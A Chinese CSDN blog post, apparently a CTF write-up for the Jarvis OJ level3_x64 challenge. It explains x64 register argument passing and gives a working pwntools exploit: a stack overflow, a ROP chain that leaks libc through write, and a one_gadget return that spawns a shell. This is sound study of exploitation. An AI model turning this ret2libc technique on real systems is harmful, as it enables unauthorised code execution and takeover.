学习笔记

最新推荐文章于 2022-11-29 01:01:18 发布
最新推荐文章于 2022-11-29 01:01:18 发布
阅读量158 收藏
点赞数
分类专栏: 学习笔记 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52632244/article/details/113232759
版权

题目来源 Jsarvis OJ level3(x64)
附件下载链接:level3_x64.rar.9169aec8b6cb4bfc3a0f5c50a7519004
这道题和上一道题的区别是这是一个64位程序
这里小结一下,32位程序的函数参数是存放在父函数的栈帧中的,在子函数调用的时候,父函数会将子函数需要的参数逆序地压入栈中,当子函数引入参数时,会通过[bp+8],[bp+c]…(逐各加4,32bit=4Byte可以这么理解)来引入参数。可以参考这个图:
在这里插入图片描述
而64位的程序它的前6个参数是依次存放在rdi、rsi、rdx、rcx、r8、r9寄存器中,第七个参数存放于栈中。
现在来讲讲这道题的解题思路
先检查保护措施在这里插入图片描述
和上一题一样的溢出位置
在这里插入图片描述
通过rop链来给寄存器赋值,这里我选择0x4006b3和0x4006b1,因为我们是利用write输出打印得到我们想要泄露的got地址,只需要三个参数,需要用到rdi、rsi、rdx,所以r15就随便赋值。
在这里插入图片描述
然后就gedget
在这里插入图片描述
这里我用的是第二个gadget,因为第一个我试了试没用。
exp:

from pwn import *
io=remote("pwn2.jarvisoj.com",9883)
e=ELF("./level3_x64")
lib=ELF("./libc-2.19.so")
di_ret=0x4006b3
si_r15=0x4006b1
payload=b'a'*0x88+p64(di_ret)+p64(1)+p64(si_r15)+p64(e.got['__libc_start_main'])+p64(0)+p64(e.plt['write'])+p64(e.symbols['vulnerable_function'])
io.sendlineafter('\n',payload)
libmain=u64(io.recv(8))
base=libmain-lib.symbols['__libc_start_main']
one_gadget=base+0x4647c
payload1=b'a'*0x88+p64(one_gadget)
io.sendlineafter('\n',payload1)
io.interactive()
Darry-long
关注
专栏目录
Vue学习笔记(尚硅谷天禹老师)
qq_55593227的博客
08-15 31万+
Vue学习笔记(尚硅谷天禹老师讲解) 1. Vue核心 1.1. Vue简介 1.1.1. 官网 英文官网 中文官网 1.1.2. 介绍与描述 动态构建用户界面的渐进式JavaScript框架 作者:尤雨溪 1.1.3. Vue的特点 遵循MVVM模式 编码简洁,体积小,运行效率高,适合移动/PC端开发 它本身只关注UI,可以引入其它第三方库开发项目 1.1.4.与其他JS框架的关联 借鉴 Angular 的模板和数据绑定技术 借鉴 React 的组件化和虚拟DOM
各个寄存器作用
dianqicyuyan的博客
10-28 7767
在此记录下寄存器的名称及作用,方便查看。 不同体系下寄存器名称: |63…32|31…16|15-8|7-0| |AH…AL…| |AX......| |EAX…| |RAX…| 不同寄存器作用: rax 作为函数返回值使用 rsp 栈指针寄存器,指向栈顶 rdirsi,rdx,rcx,r8,r9 用作函数参数,依次对应第1参数,第2参数… rbx,rbp,r12,r13,14,15 用作数据存储,遵循被调用者使用规则,简单说就是随便用,调用子函数之前要备份它,以防他被修改 r10,r11 用
C--函数调用
weixin_51311920的博客
11-29 1495
c--函数调用
X86指令编码内幕 --- ModRM 寻址模式
晓风残月的技术天地
03-08 1万+
<br />ModRM 寻址模式 在 x86/x64 指令集的世界里:<br />Opcode 对指令提供操作码,ModRM 最主要作用是对指令的 operands 提供寻址,另一个作用是对 Opcode 进行补充,而 SIB 则是对 ModRM 进行补充寻址<br /> 有两种情况下是无需用 ModRM 提供寻址的:<br />(1)一部分操作数是寄存器的,它直接嵌入 Opcode 中。<br /><br />(2)一部分操作数是立即数的,它直接嵌入指令编码中。<br /><br /> <br /><br
函数栈的变化过程
weixin_53344209的博客
09-06 1258
比如存储函数参数的值(movl $1 %rbp-4就是将参数1放到栈底的上一个位置,栈是高地址向低地址增长的,所以要减),将值赋给寄存器等。C++调用函数在内存管理中的过程就是新建一个函数栈,里面保存了函数返回值,寄存器的备份(rbp),局部变量,函数参数。1、首先,会将原函数main函数的返回地址压入栈中,返回地址就是add函数下一条指令的地址,因为函数返回后就要执行这个指令了。2、将原函数main的rbp栈底指针入栈,因为函数返回后还要维护main函数的栈底指针,main函数并没有执行完成。
x86_64及aarch64架构传参规则
rayylee
06-07 2623
x86_64及aarch64架构下c语言参数传递规则
Java基础 学习笔记 Markdownr版
06-27
学习笔记主要涵盖了Java的基础知识,包括面向对象、集合、IO流、多线程、反射与动态代理以及Java 8的新特性等方面,旨在帮助初学者或有经验的开发者巩固和提升Java编程技能。 1. 面向对象(OOP):Java的核心是...
2022吴恩达机器学习笔记汇总(共10章节).zip
最新发布
12-27
2022吴恩达机器学习笔记汇总(共10章节).zip2022吴恩达机器学习笔记汇总(共10章节).zip2022吴恩达机器学习笔记汇总(共10章节).zip2022吴恩达机器学习笔记汇总(共10章节).zip2022吴恩达机器学习笔记汇总(共10章节).zip...
Redis全套学习笔记 (带章节目录) 完整版pdf
04-20
本文是一篇关于Redis全套学习笔记的文章,主要介绍了Redis的基础知识、数据结构、持久化、集群、高可用、性能优化等方面的内容。通过本文的学习,读者可以全面掌握Redis的使用和应用,提高自己的技术水平和实践能力...
《阿秀的学习笔记》第四版By阿秀-420
06-04
《阿秀的学习笔记》第四版By阿秀-420 这份笔记的作者阿秀是一名普通的2021届计算机研究生,毕业于普通双非学校。在秋招期间,阿秀面试了多家大厂,包括百度、阿里、腾讯、美团、滴滴、字节跳动、猿辅导、华为等,...
深入理解计算机系统03——程序的机器级表示
转载请标明出处,完整项目/代码详见github:https://github.com/yiru1225
05-18 4145
本篇博客主要介绍深入计算机系统书目第三章程序的机器级表示的相关知识。
Pwnbeta-rdi,rsi,rdx,rcx,r8,r9
MuMuLee_的博客
09-17 988
C伪代码 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { const char *v3; // rdi setvbuf(stdout, 0LL, 2, 0LL); v3 = "DEBUG"; if ( !getenv("DEBUG") ) v3 = (const char *)5; return ...
32位处理器的寄存器介绍
热门推荐
飘零过客
07-24 1万+
32位CPU所含有的寄存器有:8个32位通用寄存器,6个段寄存器(ES、CS、SS、DS、FS和GS),1个指令指针寄存器(EIP),1个标志寄存器(EFlags)
64位BASM学习随笔(一)
闲人阿发伯的业余编程心得
03-15 9258
64位BASM学习随笔中的很多原则问题不仅仅适应Delphi,也适用其它64位程序语言,因为64位方式下,程序架构都是统一的。
linux 64位 栈溢出,栈溢出中64位程序的处理方法
weixin_39717865的博客
05-13 1412
在做 pwn 题时,难免会遇到64位的栈溢出程序,处理32位和64位程序会有所不同。这里总结一下64位和32位程序的差异,并结合两道例题给出解题方法0x00 差异1.64 位函数调用需要使用寄存器传参,前三个参数存放在寄存器 rdirsi、rdx 中,32 位函数调用使用栈传参(具体看下面的例子)2.64程序一个存储单元占8个字节,32位占4个字节。所以在填充 ebp(rbp) 时会有差异,这是...
32位寄存器用法介绍
kking_edc的博客
11-12 5785
一、寄存器介绍 32位CPU所含有的寄存器有: 8个32位通用寄存器,其中包含4个数据寄存器(EAX、EBX、ECX、EDX)、2个变址寄存器(ESI和EDI)和2个指针寄存器(ESP和EBP) 6个段寄存器(ES、CS、SS、DS、FS、GS) 1个指令指针寄存器(EIP) 1个标志寄存器(EFLAGS) 二、通用寄存器 每个寄存器都可作为一个32位值或两个16位值来寻址使用。某些16位的寄存器能够按照8位值寻址使用。 EAX的低16位称为AX,AX的高8位称为AH,低8位称为AL。 32 1
汇编语言总体概述——深入简出
weixin_42295969的博客
06-08 743
1.前言 程序的表示最后还是用文字表达,加法指令写成 ADD。内存地址也不再直接引用,而是用标签表示。 通过直接饮用转换为间接因哟名从而多出的步骤:assembling,然后经过标准化之后就叫做汇编语言 每一种 CPU 的机器指令都是不一样的,因此对应的汇编语言也不一样。这里介绍的是目前最常见的 x86 汇编语言,即 Intel 公司的 CPU 使用的那一种。 2.提前准备的知识 2.1 寄存器 为了处理cpu与内存之间的高低速差距,将常用的数据会存储在CPU缓存中,现在CPU有一级缓存以及
X86-64寄存器和栈帧
beckdon的专栏
04-02 2339
http://www.searchtb.com/2013/03/x86-64_register_and_function_frame.html 概要 说到x86-64,总不免要说说AMD的牛逼,x86-64是x86系列中集大成者,继承了向后兼容的优良传统,最早由AMD公司提出,代号AMD64;正是由于能向后兼容,AMD公司打了一场漂亮翻身战。导致Intel不得不转而生产兼容AM
x86-64传参规则
Maxmalloc的博客
10-07 5362
一个参数用rdi(edi)传 两个参数用rdirsi(edi、rsi)传 三个参数用rdirsi、rdx(edi、esi、edx)传 四个参数用rdirsi、rdx、rcx(edi、esi、edx、ecx)传 五个参数用rdirsi、rdx、rcx、r8(edi、esi、edx、ecx、r8)传 六个参数用rdirsi、rdx、rcx、r8、r9(edi、esi、edx、ecx...
JavaEE全栈学习笔记
"这是一份综合性的JavaEE学习笔记,由作者续祥整理,涵盖了从基础的Java知识到JavaEE的深入内容,还包括了Unix、Core Java、Java 5.0(Tiger)的新特性、XML以及Oracle数据库的相关学习资料。笔记详细介绍了各个主题的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值